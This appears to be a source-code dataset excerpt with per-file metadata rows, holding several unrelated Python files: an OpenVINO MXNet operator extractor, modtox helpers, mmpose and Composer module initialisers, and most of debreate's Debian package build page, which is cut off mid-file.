] | null | null | null | model-optimizer/extensions/front/mxnet/arange_ext.py | calvinfeng/openvino | 11f591c16852637506b1b40d083b450e56d0c8ac | [
"Apache-2.0"
] | 19 | 2021-03-26T08:11:00.000Z | 2022-02-21T13:06:26.000Z | model-optimizer/extensions/front/mxnet/arange_ext.py | calvinfeng/openvino | 11f591c16852637506b1b40d083b450e56d0c8ac | [
"Apache-2.0"
] | 1 | 2021-07-28T17:30:46.000Z | 2021-07-28T17:30:46.000Z | """
Copyright (C) 2018-2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
from extensions.ops.range import Range
from mo.front.extractor import FrontExtractorOp
from mo.front.mxnet.extractors.utils import get_mxnet_layer_attrs
from mo.graph.graph import Node
class ArangeExt(FrontExtractorOp):
op = '_arange'
enabled = True
@classmethod
def extract(cls, node: Node):
attrs = get_mxnet_layer_attrs(node.symbol_dict)
Range.update_node_stat(node, {
'start': attrs.int('start', 0),
'stop': attrs.int('stop', 0),
'repeat': attrs.int('repeat', 1),
'step': attrs.float('step', 1),
'dtype': np.dtype(attrs.str('dtype ', 'float32'))
})
return cls.enabled
| 32.25 | 73 | 0.694574 | 181 | 1,290 | 4.895028 | 0.60221 | 0.06772 | 0.029345 | 0.036117 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017699 | 0.211628 | 1,290 | 39 | 74 | 33.076923 | 0.853491 | 0.439535 | 0 | 0 | 0 | 0 | 0.089362 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.263158 | 0 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
e6a0c4454894632f570e8f7308cb8d060eed1f45 | 767 | py | Python | modtox/Helpers/helpers.py | danielSoler93/modtox | 757234140cc780f57d031b46d9293fc2bf95d18d | [
"Apache-2.0"
] | 4 | 2019-09-22T22:57:30.000Z | 2020-03-18T13:20:50.000Z | modtox/Helpers/helpers.py | danielSoler93/ModTox | 757234140cc780f57d031b46d9293fc2bf95d18d | [
"Apache-2.0"
] | 21 | 2019-09-16T11:07:13.000Z | 2019-11-20T15:06:06.000Z | modtox/Helpers/helpers.py | danielSoler93/ModTox | 757234140cc780f57d031b46d9293fc2bf95d18d | [
"Apache-2.0"
] | 2 | 2019-09-07T17:07:55.000Z | 2020-03-18T13:20:52.000Z | import os
def retrieve_molecule_number(pdb, resname):
"""
IDENTIFICATION OF MOLECULE NUMBER BASED
ON THE TER'S
"""
count = 0
with open(pdb, 'r') as x:
lines = x.readlines()
for i in lines:
if i.split()[0] == 'TER': count += 1
if i.split()[3] == resname:
molecule_number = count + 1
break
return molecule_number
class cd:
"""Context manager for changing the current working directory"""
def __init__(self, newPath):
self.newPath = os.path.expanduser(newPath)
def __enter__(self):
self.savedPath = os.getcwd()
os.chdir(self.newPath)
def __exit__(self, etype, value, traceback):
os.chdir(self.savedPath)
| 23.96875 | 68 | 0.573664 | 93 | 767 | 4.55914 | 0.580645 | 0.132075 | 0.037736 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009542 | 0.316819 | 767 | 31 | 69 | 24.741935 | 0.799618 | 0.148631 | 0 | 0 | 0 | 0 | 0.006319 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0 | 0.052632 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6a5916da8516ca978c7505bb56075d47bacaa77 | 826 | py | Python | tools/webcam/webcam_apis/nodes/__init__.py | ivmtorres/mmpose | 662cb50c639653ae2fc19d3421ce10bd02246b85 | [
"Apache-2.0"
] | 1 | 2022-02-13T12:27:40.000Z | 2022-02-13T12:27:40.000Z | tools/webcam/webcam_apis/nodes/__init__.py | ivmtorres/mmpose | 662cb50c639653ae2fc19d3421ce10bd02246b85 | [
"Apache-2.0"
] | null | null | null | tools/webcam/webcam_apis/nodes/__init__.py | ivmtorres/mmpose | 662cb50c639653ae2fc19d3421ce10bd02246b85 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) OpenMMLab. All rights reserved.
from .builder import NODES
from .faceswap_nodes import FaceSwapNode
from .frame_effect_nodes import (BackgroundNode, BugEyeNode, MoustacheNode,
NoticeBoardNode, PoseVisualizerNode,
SaiyanNode, SunglassesNode)
from .helper_nodes import ModelResultBindingNode, MonitorNode, RecorderNode
from .mmdet_nodes import DetectorNode
from .mmpose_nodes import TopDownPoseEstimatorNode
from .xdwendwen_nodes import XDwenDwenNode
__all__ = [
'NODES', 'PoseVisualizerNode', 'DetectorNode', 'TopDownPoseEstimatorNode',
'MonitorNode', 'BugEyeNode', 'SunglassesNode', 'ModelResultBindingNode',
'NoticeBoardNode', 'RecorderNode', 'FaceSwapNode', 'MoustacheNode',
'SaiyanNode', 'BackgroundNode', 'XDwenDwenNode'
]
| 45.888889 | 78 | 0.74092 | 65 | 826 | 9.246154 | 0.476923 | 0.109817 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175545 | 826 | 17 | 79 | 48.588235 | 0.882526 | 0.054479 | 0 | 0 | 0 | 0 | 0.263158 | 0.05905 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.466667 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e6aa6635d278553660a8a5b50b4098367fae31a5 | 2,446 | py | Python | composer/profiler/__init__.py | stanford-crfm/composer | 4996fbd818971afd6439961df58b531d9b47a37b | [
"Apache-2.0"
] | null | null | null | composer/profiler/__init__.py | stanford-crfm/composer | 4996fbd818971afd6439961df58b531d9b47a37b | [
"Apache-2.0"
] | null | null | null | composer/profiler/__init__.py | stanford-crfm/composer | 4996fbd818971afd6439961df58b531d9b47a37b | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 MosaicML. All Rights Reserved.
"""Performance profiling tools.
The profiler gathers performance metrics during a training run that can be used to diagnose bottlenecks and
facilitate model development.
The metrics gathered include:
* Duration of each :class:`.Event` during training
* Time taken by the data loader to return a batch
* Host metrics such as CPU, system memory, disk and network utilization over time
* Execution order, latency and attributes of PyTorch operators and GPU kernels (see :doc:`profiler`)
The following example demonstrates how to setup and perform profiling on a simple training run.
.. literalinclude:: ../../../examples/profiler_demo.py
:language: python
:linenos:
:emphasize-lines: 6, 27-49
It is required to specify an output ``profiler_trace_file`` during :class:`.Trainer` initialization to enable profiling.
The ``profiler_trace_file`` will contain the profiling trace data once the profiling run completes. By default, the :class:`.Profiler`,
:class:`.DataloaderProfiler` and :class:`.SystemProfiler` will be active. The :class:`.TorchProfiler` is **disabled** by default.
To activate the :class:`.TorchProfiler`, the ``torch_profiler_trace_dir`` must be specified *in addition* to the ``profiler_trace_file`` argument.
The ``torch_profiler_trace_dir`` will contain the Torch Profiler traces once the profiling run completes. The :class:`.Profiler` will
automatically merge the Torch traces in the ``torch_profiler_trace_dir`` into the ``profiler_trace_file``, allowing users to view a unified trace.
The complete traces can be viewed by in a Google Chrome browser navigating to ``chrome://tracing`` and loading the ``profiler_trace_file``.
Here is an example trace file:
.. image:: https://storage.googleapis.com/docs.mosaicml.com/images/profiler/profiler_trace_example.png
:alt: Example Profiler Trace File
:align: center
Additonal details an be found in the Profiler Guide.
"""
from composer.profiler._event_handler import ProfilerEventHandler
from composer.profiler._profiler import Marker, Profiler
from composer.profiler._profiler_action import ProfilerAction
# All needs to be defined properly for sphinx autosummary
__all__ = [
"Marker",
"Profiler",
"ProfilerAction",
"ProfilerEventHandler",
]
Marker.__module__ = __name__
Profiler.__module__ = __name__
ProfilerAction.__module__ = __name__
ProfilerEventHandler.__module__ = __name__
| 44.472727 | 146 | 0.780867 | 326 | 2,446 | 5.665644 | 0.48773 | 0.070384 | 0.055225 | 0.043313 | 0.069302 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004265 | 0.137367 | 2,446 | 54 | 147 | 45.296296 | 0.87109 | 0.822976 | 0 | 0 | 0 | 0 | 0.112941 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.230769 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6c80a99d05f2b6649c49c64c56164c81a82517f | 29,212 | py | Python | wizbin/build.py | RogueScholar/debreate | 0abc168c51336b31ff87c61f84bc7bb6000e88f4 | [
"MIT"
] | 97 | 2016-09-16T08:44:04.000Z | 2022-01-29T22:30:18.000Z | wizbin/build.py | RogueScholar/debreate | 0abc168c51336b31ff87c61f84bc7bb6000e88f4 | [
"MIT"
] | 34 | 2016-09-20T00:42:45.000Z | 2021-04-16T07:21:44.000Z | wizbin/build.py | RogueScholar/debreate | 0abc168c51336b31ff87c61f84bc7bb6000e88f4 | [
"MIT"
] | 24 | 2016-09-16T08:44:56.000Z | 2021-07-29T11:32:47.000Z | # -*- coding: utf-8 -*-
## \package wizbin.build
# MIT licensing
# See: docs/LICENSE.txt
import commands, os, shutil, subprocess, traceback, wx
from dbr.functions import FileUnstripped
from dbr.language import GT
from dbr.log import DebugEnabled
from dbr.log import Logger
from dbr.md5 import WriteMD5
from fileio.fileio import ReadFile
from fileio.fileio import WriteFile
from globals.bitmaps import ICON_EXCLAMATION
from globals.bitmaps import ICON_INFORMATION
from globals.errorcodes import dbrerrno
from globals.execute import ExecuteCommand
from globals.execute import GetExecutable
from globals.execute import GetSystemInstaller
from globals.ident import btnid
from globals.ident import chkid
from globals.ident import inputid
from globals.ident import pgid
from globals.paths import ConcatPaths
from globals.paths import PATH_app
from globals.strings import GS
from globals.strings import RemoveEmptyLines
from globals.strings import TextIsEmpty
from globals.system import PY_VER_MAJ
from globals.tooltips import SetPageToolTips
from input.toggle import CheckBox
from input.toggle import CheckBoxESS
from startup.tests import UsingTest
from ui.button import CreateButton
from ui.checklist import CheckListDialog
from ui.dialog import DetailedMessageDialog
from ui.dialog import ShowErrorDialog
from ui.layout import BoxSizer
from ui.output import OutputLog
from ui.panel import BorderedPanel
from ui.progress import PD_DEFAULT_STYLE
from ui.progress import ProgressDialog
from ui.progress import TimedProgressDialog
from ui.style import layout as lyt
from wiz.helper import FieldEnabled
from wiz.helper import GetField
from wiz.helper import GetMainWindow
from wiz.helper import GetPage
from wiz.wizard import WizardPage
## Build page
class Page(WizardPage):
## Constructor
#
# \param parent
# Parent <b><i>wx.Window</i></b> instance
def __init__(self, parent):
WizardPage.__init__(self, parent, pgid.BUILD)
# ----- Extra Options
pnl_options = BorderedPanel(self)
self.chk_md5 = CheckBoxESS(pnl_options, chkid.MD5, GT(u'Create md5sums file'),
name=u'MD5', defaultValue=True, commands=u'md5sum')
# The » character denotes that an alternate tooltip should be shown if the control is disabled
self.chk_md5.tt_name = u'md5»'
self.chk_md5.col = 0
# Option to strip binaries
self.chk_strip = CheckBoxESS(pnl_options, chkid.STRIP, GT(u'Strip binaries'),
name=u'strip»', defaultValue=True, commands=u'strip')
self.chk_strip.col = 0
# Deletes the temporary build tree
self.chk_rmstage = CheckBoxESS(pnl_options, chkid.DELETE, GT(u'Delete staged directory'),
name=u'RMSTAGE', defaultValue=True)
self.chk_rmstage.col = 0
# Checks the output .deb for errors
self.chk_lint = CheckBoxESS(pnl_options, chkid.LINT, GT(u'Check package for errors with lintian'),
name=u'LINTIAN', defaultValue=True, commands=u'lintian')
self.chk_lint.tt_name = u'lintian»'
self.chk_lint.col = 0
# Installs the deb on the system
self.chk_install = CheckBox(pnl_options, chkid.INSTALL, GT(u'Install package after build'),
name=u'INSTALL', commands=(u'gdebi-gtk', u'gdebi-kde',))
self.chk_install.tt_name = u'install»'
self.chk_install.col = 0
# *** Lintian Overrides *** #
if UsingTest(u'alpha'):
# FIXME: Move next to lintian check box
Logger.Info(__name__, u'Enabling alpha feature "lintian overrides" option')
self.lint_overrides = []
btn_lint_overrides = CreateButton(self, label=GT(u'Lintian overrides'))
btn_lint_overrides.Bind(wx.EVT_BUTTON, self.OnSetLintOverrides)
btn_build = CreateButton(self, btnid.BUILD, GT(u'Build'), u'build', 64)
# Display log
dsp_log = OutputLog(self)
SetPageToolTips(self)
# *** Event Handling *** #
btn_build.Bind(wx.EVT_BUTTON, self.OnBuild)
# *** Layout *** #
lyt_options = wx.GridBagSizer()
next_row = 0
prev_row = next_row
for CHK in pnl_options.Children:
row = next_row
FLAGS = lyt.PAD_LR
if CHK.col:
row = prev_row
FLAGS = wx.RIGHT
lyt_options.Add(CHK, (row, CHK.col), flag=FLAGS, border=5)
if not CHK.col:
prev_row = next_row
next_row += 1
pnl_options.SetSizer(lyt_options)
pnl_options.SetAutoLayout(True)
pnl_options.Layout()
lyt_buttons = BoxSizer(wx.HORIZONTAL)
lyt_buttons.Add(btn_build, 1)
lyt_main = BoxSizer(wx.VERTICAL)
lyt_main.AddSpacer(10)
lyt_main.Add(wx.StaticText(self, label=GT(u'Extra Options')), 0,
lyt.ALGN_LB|wx.LEFT, 5)
lyt_main.Add(pnl_options, 0, wx.LEFT, 5)
lyt_main.AddSpacer(5)
if UsingTest(u'alpha'):
#lyt_main.Add(wx.StaticText(self, label=GT(u'Lintian overrides')), 0, wx.LEFT, 5)
lyt_main.Add(btn_lint_overrides, 0, wx.LEFT, 5)
lyt_main.AddSpacer(5)
lyt_main.Add(lyt_buttons, 0, lyt.ALGN_C)
lyt_main.Add(dsp_log, 2, wx.EXPAND|lyt.PAD_LRB, 5)
self.SetAutoLayout(True)
self.SetSizer(lyt_main)
self.Layout()
## Method that builds the actual Debian package
#
# \param task_list
# \b \e dict : Task string IDs & page data
# \param build_path
# \b \e unicode|str : Directory where .deb will be output
# \param filename
# \b \e unicode|str : Basename of output file without .deb extension
# \return
# \b \e dbrerror : SUCCESS if build completed successfully
def Build(self, task_list, build_path, filename):
# Declare this here in case of error before progress dialog created
build_progress = None
try:
# Other mandatory tasks that will be processed
mandatory_tasks = (
u'stage',
u'install_size',
u'control',
u'build',
)
# Add other mandatory tasks
for T in mandatory_tasks:
task_list[T] = None
task_count = len(task_list)
# Add each file for updating progress dialog
if u'files' in task_list:
task_count += len(task_list[u'files'])
# Add each script for updating progress dialog
if u'scripts' in task_list:
task_count += len(task_list[u'scripts'])
if DebugEnabled():
task_msg = GT(u'Total tasks: {}').format(task_count)
print(u'DEBUG: [{}] {}'.format(__name__, task_msg))
for T in task_list:
print(u'\t{}'.format(T))
create_changelog = u'changelog' in task_list
create_copyright = u'copyright' in task_list
pg_control = GetPage(pgid.CONTROL)
pg_menu = GetPage(pgid.MENU)
stage_dir = u'{}/{}__dbp__'.format(build_path, filename)
if os.path.isdir(u'{}/DEBIAN'.format(stage_dir)):
try:
shutil.rmtree(stage_dir)
except OSError:
ShowErrorDialog(GT(u'Could not free stage directory: {}').format(stage_dir),
title=GT(u'Cannot Continue'))
return (dbrerrno.EEXIST, None)
# Actual path to new .deb
deb = u'"{}/{}.deb"'.format(build_path, filename)
progress = 0
task_msg = GT(u'Preparing build tree')
Logger.Debug(__name__, task_msg)
wx.Yield()
build_progress = ProgressDialog(GetMainWindow(), GT(u'Building'), task_msg,
maximum=task_count,
style=PD_DEFAULT_STYLE|wx.PD_ELAPSED_TIME|wx.PD_ESTIMATED_TIME|wx.PD_CAN_ABORT)
DIR_debian = ConcatPaths((stage_dir, u'DEBIAN'))
# Make a fresh build tree
os.makedirs(DIR_debian)
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
def UpdateProgress(current_task, message=None):
task_eval = u'{} / {}'.format(current_task, task_count)
if message:
Logger.Debug(__name__, u'{} ({})'.format(message, task_eval))
wx.Yield()
build_progress.Update(current_task, message)
return
wx.Yield()
build_progress.Update(current_task)
# *** Files *** #
if u'files' in task_list:
UpdateProgress(progress, GT(u'Copying files'))
no_follow_link = GetField(GetPage(pgid.FILES), chkid.SYMLINK).IsChecked()
# TODO: move this into a file functions module
def _copy(f_src, f_tgt, exe=False):
# NOTE: Python 3 appears to have follow_symlinks option for shutil.copy
# FIXME: copying nested symbolic link may not work
if os.path.isdir(f_src):
if os.path.islink(f_src) and no_follow_link:
Logger.Debug(__name__, u'Adding directory symbolic link to stage: {}'.format(f_tgt))
os.symlink(os.readlink(f_src), f_tgt)
else:
Logger.Debug(__name__, u'Adding directory to stage: {}'.format(f_tgt))
shutil.copytree(f_src, f_tgt)
os.chmod(f_tgt, 0o0755)
elif os.path.isfile(f_src):
if os.path.islink(f_src) and no_follow_link:
Logger.Debug(__name__, u'Adding file symbolic link to stage: {}'.format(f_tgt))
os.symlink(os.readlink(f_src), f_tgt)
else:
if exe:
Logger.Debug(__name__, u'Adding executable to stage: {}'.format(f_tgt))
else:
Logger.Debug(__name__, u'Adding file to stage: {}'.format(f_tgt))
shutil.copy(f_src, f_tgt)
# Set FILE permissions
if exe:
os.chmod(f_tgt, 0o0755)
else:
os.chmod(f_tgt, 0o0644)
files_data = task_list[u'files']
for FILE in files_data:
file_defs = FILE.split(u' -> ')
source_file = file_defs[0]
target_file = u'{}{}/{}'.format(stage_dir, file_defs[2], file_defs[1])
target_dir = os.path.dirname(target_file)
if not os.path.isdir(target_dir):
os.makedirs(target_dir)
# Remove asteriks from exectuables
exe = False
if source_file[-1] == u'*':
exe = True
source_file = source_file[:-1]
_copy(source_file, u'{}/{}'.format(target_dir, os.path.basename(source_file)), exe)
# Individual files
progress += 1
UpdateProgress(progress)
# Entire file task
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Strip files ***#
# FIXME: Needs only be run if 'files' step is used
if u'strip' in task_list:
UpdateProgress(progress, GT(u'Stripping binaries'))
for ROOT, DIRS, FILES in os.walk(stage_dir): #@UnusedVariable
for F in FILES:
# Don't check files in DEBIAN directory
if ROOT != DIR_debian:
F = ConcatPaths((ROOT, F))
if FileUnstripped(F):
Logger.Debug(__name__, u'Unstripped file: {}'.format(F))
# FIXME: Strip command should be set as class member?
ExecuteCommand(GetExecutable(u'strip'), F)
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
package = GetField(pg_control, inputid.PACKAGE).GetValue()
# Make sure that the directory is available in which to place documentation
if create_changelog or create_copyright:
doc_dir = u'{}/usr/share/doc/{}'.format(stage_dir, package)
if not os.path.isdir(doc_dir):
os.makedirs(doc_dir)
# *** Changelog *** #
if create_changelog:
UpdateProgress(progress, GT(u'Creating changelog'))
# If changelog will be installed to default directory
changelog_target = task_list[u'changelog'][0]
if changelog_target == u'STANDARD':
changelog_target = ConcatPaths((u'{}/usr/share/doc'.format(stage_dir), package))
else:
changelog_target = ConcatPaths((stage_dir, changelog_target))
if not os.path.isdir(changelog_target):
os.makedirs(changelog_target)
WriteFile(u'{}/changelog'.format(changelog_target), task_list[u'changelog'][1])
CMD_gzip = GetExecutable(u'gzip')
if CMD_gzip:
UpdateProgress(progress, GT(u'Compressing changelog'))
c = u'{} -n --best "{}/changelog"'.format(CMD_gzip, changelog_target)
clog_status = commands.getstatusoutput(c.encode(u'utf-8'))
if clog_status[0]:
ShowErrorDialog(GT(u'Could not compress changelog'), clog_status[1], warn=True, title=GT(u'Warning'))
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Copyright *** #
if create_copyright:
UpdateProgress(progress, GT(u'Creating copyright'))
WriteFile(u'{}/usr/share/doc/{}/copyright'.format(stage_dir, package), task_list[u'copyright'])
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# Characters that should not be in filenames
invalid_chars = (u' ', u'/')
# *** Menu launcher *** #
if u'launcher' in task_list:
UpdateProgress(progress, GT(u'Creating menu launcher'))
# This might be changed later to set a custom directory
menu_dir = u'{}/usr/share/applications'.format(stage_dir)
menu_filename = pg_menu.GetOutputFilename()
# Remove invalid characters from filename
for char in invalid_chars:
menu_filename = menu_filename.replace(char, u'_')
if not os.path.isdir(menu_dir):
os.makedirs(menu_dir)
WriteFile(u'{}/{}.desktop'.format(menu_dir, menu_filename), task_list[u'launcher'])
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** md5sums file *** #
# Good practice to create hashes before populating DEBIAN directory
if u'md5sums' in task_list:
UpdateProgress(progress, GT(u'Creating md5sums'))
if not WriteMD5(stage_dir, parent=build_progress):
# Couldn't call md5sum command
build_progress.Cancel()
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Scripts *** #
if u'scripts' in task_list:
UpdateProgress(progress, GT(u'Creating scripts'))
scripts = task_list[u'scripts']
for SCRIPT in scripts:
script_name = SCRIPT
script_text = scripts[SCRIPT]
script_filename = ConcatPaths((stage_dir, u'DEBIAN', script_name))
WriteFile(script_filename, script_text)
# Make sure scipt path is wrapped in quotes to avoid whitespace errors
os.chmod(script_filename, 0755)
os.system((u'chmod +x "{}"'.format(script_filename)))
# Individual scripts
progress += 1
UpdateProgress(progress)
# Entire script task
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Control file *** #
UpdateProgress(progress, GT(u'Getting installed size'))
# Get installed-size
installed_size = os.popen((u'du -hsk "{}"'.format(stage_dir))).readlines()
installed_size = installed_size[0].split(u'\t')
installed_size = installed_size[0]
# Insert Installed-Size into control file
control_data = pg_control.Get().split(u'\n')
control_data.insert(2, u'Installed-Size: {}'.format(installed_size))
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# Create final control file
UpdateProgress(progress, GT(u'Creating control file'))
# dpkg fails if there is no newline at end of file
control_data = u'\n'.join(control_data).strip(u'\n')
# Ensure there is only one empty trailing newline
# Two '\n' to show physical empty line, but not required
# Perhaps because string is not null terminated???
control_data = u'{}\n\n'.format(control_data)
WriteFile(u'{}/DEBIAN/control'.format(stage_dir), control_data, noStrip=u'\n')
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Final build *** #
UpdateProgress(progress, GT(u'Running dpkg'))
working_dir = os.path.split(stage_dir)[0]
c_tree = os.path.split(stage_dir)[1]
deb_package = u'{}.deb'.format(filename)
# Move the working directory becuase dpkg seems to have problems with spaces in path
os.chdir(working_dir)
# HACK to fix file/dir permissions
for ROOT, DIRS, FILES in os.walk(stage_dir):
for D in DIRS:
D = u'{}/{}'.format(ROOT, D)
os.chmod(D, 0o0755)
for F in FILES:
F = u'{}/{}'.format(ROOT, F)
if os.access(F, os.X_OK):
os.chmod(F, 0o0755)
else:
os.chmod(F, 0o0644)
# FIXME: Should check for working fakeroot & dpkg-deb executables
build_status = commands.getstatusoutput((u'{} {} -b "{}" "{}"'.format(GetExecutable(u'fakeroot'), GetExecutable(u'dpkg-deb'), c_tree, deb_package)))
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** Delete staged directory *** #
if u'rmstage' in task_list:
UpdateProgress(progress, GT(u'Removing temp directory'))
try:
shutil.rmtree(stage_dir)
except OSError:
ShowErrorDialog(GT(u'An error occurred when trying to delete the build tree'),
parent=build_progress)
progress += 1
if build_progress.WasCancelled():
build_progress.Destroy()
return (dbrerrno.ECNCLD, None)
# *** ERROR CHECK
if u'lintian' in task_list:
UpdateProgress(progress, GT(u'Checking package for errors'))
# FIXME: Should be set as class memeber?
CMD_lintian = GetExecutable(u'lintian')
errors = commands.getoutput((u'{} {}'.format(CMD_lintian, deb)))
if errors != wx.EmptyString:
e1 = GT(u'Lintian found some issues with the package.')
e2 = GT(u'Details saved to {}').format(filename)
WriteFile(u'{}/{}.lintian'.format(build_path, filename), errors)
DetailedMessageDialog(build_progress, GT(u'Lintian Errors'),
ICON_INFORMATION, u'{}\n{}.lintian'.format(e1, e2), errors).ShowModal()
progress += 1
# Close progress dialog
wx.Yield()
build_progress.Update(progress)
build_progress.Destroy()
# Build completed successfullly
if not build_status[0]:
return (dbrerrno.SUCCESS, deb_package)
if PY_VER_MAJ <= 2:
# Unicode decoder has trouble with certain characters. Replace any
# non-decodable characters with � (0xFFFD).
build_output = list(build_status[1])
# String & unicode string incompatibilities
index = 0
for C in build_output:
try:
GS(C)
except UnicodeDecodeError:
build_output[index] = u'�'
index += 1
build_status = (build_status[0], u''.join(build_output))
# Build failed
return (build_status[0], build_status[1])
except:
if build_progress:
build_progress.Destroy()
return(dbrerrno.EUNKNOWN, traceback.format_exc())
## TODO: Doxygen
#
# \return
# \b \e tuple containing Return code & build details
def BuildPrep(self):
# Declare these here in case of error before dialogs created
save_dia = None
prebuild_progress = None
try:
# List of tasks for build process
# 'stage' should be very first task
task_list = {}
# Control page
pg_control = GetPage(pgid.CONTROL)
fld_package = GetField(pg_control, inputid.PACKAGE)
fld_version = GetField(pg_control, inputid.VERSION)
fld_maint = GetField(pg_control, inputid.MAINTAINER)
fld_email = GetField(pg_control, inputid.EMAIL)
fields_control = (
fld_package,
fld_version,
fld_maint,
fld_email,
)
# Menu launcher page
pg_launcher = GetPage(pgid.MENU)
# Check to make sure that all required fields have values
required = list(fields_control)
if pg_launcher.IsOkay():
task_list[u'launcher'] = pg_launcher.Get()
required.append(GetField(pg_launcher, inputid.NAME))
if not GetField(pg_launcher, chkid.FNAME).GetValue():
required.append(GetField(pg_launcher, inputid.FNAME))
for item in required:
if TextIsEmpty(item.GetValue()):
field_name = GT(item.GetName().title())
page_name = pg_control.GetName()
if item not in fields_control:
page_name = pg_launcher.GetName()
return (dbrerrno.FEMPTY, u'{} ➜ {}'.format(page_name, field_name))
# Get information from control page for default filename
package = fld_package.GetValue()
# Remove whitespace
package = package.strip(u' \t')
package = u'-'.join(package.split(u' '))
version = fld_version.GetValue()
# Remove whitespace
version = version.strip(u' \t')
version = u''.join(version.split())
arch = GetField(pg_control, inputid.ARCH).GetStringSelection()
# Dialog for save destination
ttype = GT(u'Debian packages')
save_dia = wx.FileDialog(self, GT(u'Save'), os.getcwd(), wx.EmptyString, u'{}|*.deb'.format(ttype),
wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT|wx.FD_CHANGE_DIR)
save_dia.SetFilename(u'{}_{}_{}.deb'.format(package, version, arch))
if not save_dia.ShowModal() == wx.ID_OK:
return (dbrerrno.ECNCLD, None)
build_path = os.path.split(save_dia.GetPath())[0]
filename = os.path.split(save_dia.GetPath())[1].split(u'.deb')[0]
# Control, menu, & build pages not added to this list
page_checks = (
(pgid.FILES, u'files'),
(pgid.SCRIPTS, u'scripts'),
(pgid.CHANGELOG, u'changelog'),
(pgid.COPYRIGHT, u'copyright'),
)
# Install step is not added to this list
# 'control' should be after 'md5sums'
# 'build' should be after 'control'
other_checks = (
(self.chk_md5, u'md5sums'),
(self.chk_strip, u'strip'),
(self.chk_rmstage, u'rmstage'),
(self.chk_lint, u'lintian'),
)
prep_task_count = len(page_checks) + len(other_checks)
progress = 0
wx.Yield()
prebuild_progress = ProgressDialog(GetMainWindow(), GT(u'Preparing to build'),
maximum=prep_task_count)
if wx.MAJOR_VERSION < 3:
# Resize dialog for better fit
pb_size = prebuild_progress.GetSizeTuple()
pb_size = (pb_size[0]+200, pb_size[1])
prebuild_progress.SetSize(pb_size)
prebuild_progress.CenterOnParent()
for PID, id_string in page_checks:
wx.Yield()
prebuild_progress.Update(progress, GT(u'Checking {}').format(id_string))
wizard_page = GetPage(PID)
if wizard_page.IsOkay():
task_list[id_string] = wizard_page.Get()
progress += 1
for task_check, id_string in other_checks:
wx.Yield()
prebuild_progress.Update(progress, GT(u'Testing for: {}').format(task_check.GetLabel()))
if task_check.GetValue():
task_list[id_string] = None
progress += 1
# Close progress dialog
wx.Yield()
prebuild_progress.Update(progress)
prebuild_progress.Destroy()
return (dbrerrno.SUCCESS, (task_list, build_path, filename))
except:
if save_dia:
save_dia.Destroy()
if prebuild_progress:
prebuild_progress.Destroy()
return (dbrerrno.EUNKNOWN, traceback.format_exc())
## TODO: Doxygen
def GetSaveData(self):
build_list = []
options = (
self.chk_md5,
self.chk_rmstage,
self.chk_lint,
)
for O in options:
if O.GetValue():
build_list.append(u'1')
else:
build_list.append(u'0')
if self.chk_strip.GetValue():
build_list.append(u'strip')
return u'<<BUILD>>\n{}\n<</BUILD>>'.format(u'\n'.join(build_list))
## Installs the built .deb package onto the system
#
